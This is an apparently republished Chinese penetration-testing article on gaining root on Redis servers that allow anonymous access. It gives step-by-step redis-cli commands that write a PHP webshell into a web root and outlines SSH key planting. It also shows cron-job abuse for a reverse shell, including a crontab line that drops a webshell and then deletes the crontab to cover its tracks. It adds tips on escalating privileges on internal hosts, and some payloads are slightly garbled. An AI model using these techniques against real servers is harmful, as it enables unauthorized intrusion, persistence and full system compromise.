Redis 匿名访问利用技巧

安全 网站安全 Redis
redis还有一个发现就是,高版本的linux提权不了,我们也可以通过redis直接提权,也就是第三方软件提权的一种方法吧。

Redis 数据库在内网渗透中比较常见,结合近期的利用过程,记录下:

在内网机器中下载Redis 解压 make一下,不用make install

A) 一般情况下知道路径写shell

  1. ./redis-cli -h IP  
  2. config set dir /home/wwwroot/default 
  3. config set dbfilename redis.php 
  4. set webshell " phpinfo(); ?>"  
  5. save 

B) 利用公匙免密码登录1 本机生成公匙2 利用redis将公匙备份到redis机器上C) 利用linux的任务反弹shell

1 /var/spool/cron linux机器下默认的计划任务,开启cron的时候,linux会定时去执行里面的任务,文件名为用户名2 redis 设置dbfilename 到上面可以直接反弹shell回来

大概总结了主要是以上三种方式获取redis服务器的权限,因为redis一般都是root权限启动的,所以权限很大。

但渗透过程中总是会出现意向不到的情况,有木有啊。

第一种方式,如果redis数据库太大,导致php马超限,直接500不解析,那我们可以通过第三个命令写个马到web目录

  1. */1 * * * * echo " phpinofo();?>" >/var/www/html/90sec.php;crontab -r 

这样的马就没问题了

第二种方式,我测试本机没问题,但是到了渗透环境就出问题了,应该是ssh免密码登录 .ssh目录权限问题,成功几率不太大

第三种方式,最喜欢的一种,简单粗暴明了,连提权都省了(如果是重要的机器,root用户一般都会有计划任务,建议先用低权限的用户反弹个shell上去 探下情况,在root) 但也遇到很奇葩的不给连接外网的机器,那就只能写个shell到web目录,或者在内网监听一个bashshell ,自己去连接就ok了

redis还有一个发现就是,高版本的linux提权不了,我们也可以通过redis直接提权,也就是第三方软件提权的一种方法吧。

责任编辑:武晓燕 来源: 红黑联盟
相关推荐

2011-03-04 15:38:54

Vsftpd

2011-11-24 21:05:44

ibmdw

2010-01-05 16:12:55

Javascript匿

2021-11-23 10:15:57

Linux代码匿名页

2010-08-18 13:13:01

静态路由

2013-01-30 13:18:38

Redis监控

2009-12-31 13:56:57

ADO访问接口

2009-12-18 14:10:29

Ruby访问剪贴板

2024-02-27 09:43:37

Pythonlambda函数

2022-05-06 18:55:29

Java技巧Shellcode

2019-02-25 15:15:44

Windows 10Windows技巧

2011-06-07 16:03:48

匿名SQL Server

2009-07-09 10:15:23

PHP DOM

2012-05-16 10:30:11

远程访问安全策略

2010-01-04 17:54:41

Silverligh访

2009-07-03 13:56:21

JSP编程技巧

2016-03-01 14:37:38

iOSLLDB调试技巧

2023-04-06 10:26:25

Java内存马Jetty

2022-02-11 09:38:14

Java技巧反射

2011-09-01 10:31:16

ubuntuwindows
点赞
收藏

51CTO技术栈公众号